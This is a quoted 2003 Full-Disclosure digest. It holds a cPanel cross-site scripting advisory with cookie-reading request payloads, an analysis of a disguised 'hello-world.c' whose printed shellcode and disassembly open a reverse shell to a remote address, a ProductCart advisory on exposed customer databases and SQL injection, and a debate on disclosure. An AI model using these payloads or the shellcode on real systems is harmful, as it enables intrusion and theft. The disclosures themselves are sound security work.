> > <P><FONT SIZE=3D2>Ampa Bldg.,&nbsp; 1 Sapir Street.</FONT>
> > <BR><FONT SIZE=3D2>Mail:&nbsp;&nbsp;&nbsp;&nbsp; =
> > P.O.Box&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12047</FONT>
> > <BR><FONT SIZE=3D2>Herzliya&nbsp;&nbsp;&nbsp; 46733,&nbsp;&nbsp;&nbsp; =
> > ISRAEL</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>Tel: +972-9-9586077 Ext. 236</FONT>
> > <BR><FONT SIZE=3D2>Fax: +972-9-9576337</FONT>
> > </P>
> >
> > </BODY>
> > </HTML>
> > ------_=_NextPart_001_01C3439A.1FBE84F0--
> >
> > --__--__--
> >
> > Message: 6
> > Date: Sun, 06 Jul 2003 11:46:44 +0300
> > From: Ory Segal <ory.segal@...ctuminc.com>
> > To: BUGTRAQ@...URITYFOCUS.COM, full-disclosure@...ts.netsys.com,
> >    webappsec@...URITYFOCUS.COM
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > -------------------------------------------------------------------------------
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > -------------------------------------------------------------------------------
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> >  From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button,
> > they can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or
> > execution of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the
> > URL part
> > of HTTP requests and present them to the administrator as is, thus,
> > allowing an
> > attacker to embed malicious HTML tags that will later be parsed and
> > executed by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> >   GET /<script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE)
> > presented the
> > latest requests as HTML links, thus the malicious payload must terminate
> > the <a>
> > tag before opening a new one. For example:
> >
> >   GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > --__--__--
> >
> > Message: 7
> > From: "Dave Korn" <davek_throwaway@...mail.com>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] tripbid secure codes
> > Date: Sun, 06 Jul 2003 12:23:01 +0000
> >
> >
> > ----- Original Message -----
> > From: <auto94042@...hmail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Friday, June 27, 2003 6:25 AM
> > Subject: [Full-Disclosure] tripbid secure codes
> >
> >
> > >i post the thing to the vuln dev some days ago and get quite a big
> > respnose.
> > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but
> > >some folks want me to look at the code they make, specially a 'hello-
> > >world.c' progie -> " holo, can you check my hello-world.c for strcpy
> > >?? securecode do the trick " <- paraphase the msg, i rm -rf / it since
> > >it make me anger and stress it !
> > >
> > >i am willing to try the secure code since the grep 'strcpy' is losing
> > >his thrills so i trick around with :
> > >[user@...alhost]$ ./securecode -s hello-world.c
> >
> >
> > Never ever EVER run an insecure program over arbitrary data you receive from
> > the net without checking it for safety first.....  Let's look at this
> > hello-world.c before we run anything on it....
> >
> >
> > Z:\sploits-misc\targzip>type hello-world.c
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
> > ?!? ?!? ?!? ?!? ?!? ?!?
> > ?!??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Q??Q??Q??Q?????f????1?1?QQh?b??fh????fQ????SWR?????f??1?9?t?1?????1???????1?????????1?????????1?1?Phn/shh//bi??PS??????1?????
> >
> >
> > Heh.  Boy, did j00 get hax0red!  Here's what's actually in that file:
> >
> > $0000 - $00ff:  'A' x 256
> > $0100 - $011f: DWORD $bffff321 x 8
> > $0120 - $0378 $90 = NOP x 600
> > $0378 - $03fa: Binary shellcode
> > $03fb - $03fc: CR, LF
> > <EOF>
> >
> > In other words, it's one very long line.  Looks to me like the securecode
> > program reads each line of the .c file into a buffer that's only 256 bytes
> > long; this exploit fills it with 'A', then overwrites the return address on
> > the stack with a pointer into the NOP slide.  Here's a disassembly of the
> > shellcode: note that offset 0 in this disassembly is offset $0370 in the
> > file.  Sorry for not commenting this, but I don't speak linux asm; however I
> > can see a whole bunch of syscalls going on in there; the values in eax
> > should tell you whether anything nastier than a few mkdirs was done to
> > you...
> >
> > Z:\sploits-misc\targzip>objdump -D --target=binary
> > hello-world2.bin --architectu
> > re=i386
> >
> > hello-world2.bin:     file format binary
> >
> > objdump: hello-world2.bin: no symbols
> > Disassembly of section .data:
> >
> > 00000000 <.data>:
> >    0:   90                      nop
> >    1:   90                      nop
> >    2:   90                      nop
> >    3:   90                      nop
> >    4:   90                      nop
> >    5:   90                      nop
> >    6:   90                      nop
> >    7:   90                      nop
> >    8:   90                      nop
> >    9:   31 c0                   xor    %eax,%eax
> >    b:   31 db                   xor    %ebx,%ebx
> >    d:   31 c9                   xor    %ecx,%ecx
> >    f:   51                      push   %ecx
> >   10:   b1 06                   mov    $0x6,%cl
> >   12:   51                      push   %ecx
> >   13:   b1 01                   mov    $0x1,%cl
> >   15:   51                      push   %ecx
> >   16:   b1 02                   mov    $0x2,%cl
> >   18:   51                      push   %ecx
> >   19:   89 e1                   mov    %esp,%ecx
> >   1b:   b3 01                   mov    $0x1,%bl
> >   1d:   b0 66                   mov    $0x66,%al
> >   1f:   cd 80                   int    $0x80
> >   21:   89 c2                   mov    %eax,%edx
> >   23:   31 c0                   xor    %eax,%eax
> >   25:   31 c9                   xor    %ecx,%ecx
> >   27:   51                      push   %ecx
> >   28:   51                      push   %ecx
> >   29:   68 d4 62 f7 cc          push   $0xccf762d4
> >   2e:   66 68 b0 ef             pushw  $0xefb0
> >   32:   b1 02                   mov    $0x2,%cl
> >   34:   66 51                   push   %cx
> >   36:   89 e7                   mov    %esp,%edi
> >   38:   b3 10                   mov    $0x10,%bl
> >   3a:   53                      push   %ebx
> >   3b:   57                      push   %edi
> >   3c:   52                      push   %edx
> >   3d:   89 e1                   mov    %esp,%ecx
> >   3f:   b3 03                   mov    $0x3,%bl
> >   41:   b0 66                   mov    $0x66,%al
> >   43:   cd 80                   int    $0x80
> >   45:   31 c9                   xor    %ecx,%ecx
> >   47:   39 c1                   cmp    %eax,%ecx
> >   49:   74 06                   je     0x51
> >   4b:   31 c0                   xor    %eax,%eax
> >   4d:   b0 01                   mov    $0x1,%al
> >   4f:   cd 80                   int    $0x80
> >   51:   31 c0                   xor    %eax,%eax
> >   53:   b0 3f                   mov    $0x3f,%al
> >   55:   89 d3                   mov    %edx,%ebx
> >   57:   cd 80                   int    $0x80
> >   59:   31 c0                   xor    %eax,%eax
> >   5b:   b0 3f                   mov    $0x3f,%al
> >   5d:   89 d3                   mov    %edx,%ebx
> >   5f:   b1 01                   mov    $0x1,%cl
> >   61:   cd 80                   int    $0x80
> >   63:   31 c0                   xor    %eax,%eax
> >   65:   b0 3f                   mov    $0x3f,%al
> >   67:   89 d3                   mov    %edx,%ebx
> >   69:   b1 02                   mov    $0x2,%cl
> >   6b:   cd 80                   int    $0x80
> >   6d:   31 c0                   xor    %eax,%eax
> >   6f:   31 d2                   xor    %edx,%edx
> >   71:   50                      push   %eax
> >   72:   68 6e 2f 73 68          push   $0x68732f6e
> >   77:   68 2f 2f 62 69          push   $0x69622f2f
> >   7c:   89 e3                   mov    %esp,%ebx
> >   7e:   50                      push   %eax
> >   7f:   53                      push   %ebx
> >   80:   89 e1                   mov    %esp,%ecx
> >   82:   b0 0b                   mov    $0xb,%al
> >   84:   cd 80                   int    $0x80
> >   86:   31 c0                   xor    %eax,%eax
> >   88:   b0 01                   mov    $0x1,%al
> >   8a:   cd 80                   int    $0x80
> >   8c:   0d                      .byte 0xd
> >   8d:   0a                      .byte 0xa
> >
> >
> >
> >         DaveK
> >
> > _________________________________________________________________
> > Sign-up for a FREE BT Broadband connection today!
> > http://www.msn.co.uk/specials/btbroadband
> >
> >
> > --__--__--
> >
> > Message: 8
> > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
> > From: "Larry W. Cashdollar" <lwc@...id.ath.cx>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> >  can be downloaded remotely
> >
> >
> >
> > 949 is a legit zip code in cali.
> >
> >
> > On Sat, 5 Jul 2003, KF wrote:
> >
> > > Was that legit California data? I am sure than making someone have a
> > > nice weekend you just made multiple someones have a shitty month ahead
> > > of them...
> > > http://www.theregister.co.uk/content/55/31509.html
> > >
> > > -KF
> > >
> > > gyrniff wrote:
> > >
> > > >URL:
> > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > >Change the name Paul to Paul'
> > > >
> > > >Microsoft OLE DB Provider for ODBC Drivers
> > > > error '80040e14'
> > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > > >
> > > >have a nice weekend ;-)
> > > >
> > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > >
> > > >
> > > >>ProductCart database file can be downloaded remotely
> > > >>=================================================
> > > >>
> > > >>PROGRAM: ProductCart
> > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > > >>RISK: High
> > > >>
> > > >>
> > > >>DESCRIPTION
> > > >>=================================================
> > > >>
> > > >>ProductCart? is an ASP shopping cart that combines sophisticated
> > > >>ecommerce features with time-saving store management tools and remarkable
> > > >>ease of use. It is widely used by many e-commerce sites.
> > > >>
> > > >>DETAILS
> > > >>=================================================
> > > >>
> > > >>In the default installation, product cart database file is located at
> > > >>/productcart/database/EIPC.mdb which can be accessed easily
> > > >>by any remote attackers.
> > > >>
> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >>
> > > >>The database file includes the store administration password as well as
> > > >>customer's info (including credit card info).
> > > >>
> > > >>
> > > >> WORKAROUND
> > > >>=================================================
> > > >>
> > > >>Rename the database file, put it in a protected directory.
> > > >>
> > > >>
> > > >>CREDITS
> > > >>=================================================
> > > >>
> > > >>Discovered by Tri Huynh from Sentry Union
> > > >>
> > > >>
> > > >>DISLAIMER
> > > >>=================================================
> > > >>
> > > >>The information within this paper may change without notice. Use of
> > > >>this information constitutes acceptance for use in an AS IS condition.
> > > >>There are NO warranties with regard to this information. In no event
> > > >>shall the author be liable for any damages whatsoever arising out of
> > > >>or in connection with the use or spread of this information. Any use
> > > >>of this information is at the user's own risk.
> > > >>
> > > >>
> > > >>FEEDBACK
> > > >>=================================================
> > > >>
> > > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > > >>
> > > >>
> > > >
> > > >_______________________________________________
> > > >Full-Disclosure - We believe in it.
> > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > >
> > > >
> > > >
> > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > Message: 9
> > From: "Kristian Hermansen" <this_is_kris@...mail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > Date: Tue, 1 Jul 2003 22:49:59 -0400
> >
> > Yes, programmers should be trained to write better code...but it is more
> > profitiable to allow sloppy code and a simple fix later (behind the scenes
> > with vendor notification).  This is MS point-of-view.  This is why they want
> > vendor notification, rather than public notification.  Again, I say let the
> > 0-days fly.
> >
> > Did you know that certain US government agencies have teams that their only
> > job is to break software?  This has been going on since the 1970's.  It
> > helps to produce secure code in mission critical applications that the
> > military needs.  I am not saying that MS needs to be SO drastic...but a
> > small team for their MOST popular products would sure be wise to start with.
> > Why not hire fucking intern teenagers from russia to "Crash Test" their
> > development projects (facetious)?  Would it be so difficult/expensive to
> > hire some of the main companies that are breaking your software???
> >
> > Kris Hermansen
> >
> > ----- Original Message -----
> > From: "Schmehl, Paul L" <pauls@...allas.edu>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Tuesday, July 01, 2003 6:58 PM
> > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
> >
> >
> > > > -----Original Message-----
> > > > From: Kristian Hermansen [mailto:this_is_kris@...mail.com]
> > > > Sent: Tuesday, July 01, 2003 3:09 PM
> > > > To: full-disclosure@...ts.netsys.com
> > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > > >
> > > >
> > > > I agree.  It is not our problem.  The reason is this.
> > > > Microsoft would like to reduce costs.  Fixing bugs in
> > > > products costs money, and 0-day bugs need immediate fixes
> > > > which slow down MS total output ability.  They would like to
> > > > see everyone reporting to the vendor first because this saves
> > > > them money!!! In this respect, this also allows them to go on
> > > > writing sloppy code in order to save a few bucks on every
> > > > product, thus reducing their overhead.  I don't want sloppy
> > > > code.  Let the 0-days fly....maybe MS will start doing
> > > > extensive testing to their products before they release it
> > > > for sale to millions of customers.  I thought .NET was
> > > > supposed to fix all this  ;-P
> > >
> > > That's too funny.  Microsoft ran a "buffer overflow finder" against the
> > > codebase for XP, and the VP in charge announced publicly that they had
> > > "eliminated buffer overflows in XP".  Within thirty days, eEye announced
> > > the UPnP vulnerability in SSDP, which is the single most devastating
> > > hole ever found in MS products.  (You can compromise an entire network
> > > of XP machines with one attack, simultaneously.)
> > >
> > > You don't fix code by extensive testing.  You fix it by teaching how to
> > > write secure code to begin with *and* by ongoing, consistent audits done
> > > before code is released.  (OpenBSD has been doing this for years, and
> > > look at the results.)
> > >
> > > Paul Schmehl (pauls@...allas.edu)
> > > Adjunct Information Security Officer
> > > The University of Texas at Dallas
> > > AVIEN Founding Member
> > > http://www.utdallas.edu/~pauls/
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > _______________________________________________
> > Full-Disclosure mailing list
> > Full-Disclosure@...ts.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> >
> >
> > End of Full-Disclosure Digest
> --
> Markus Nielsen <intercool@...magnet.com>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists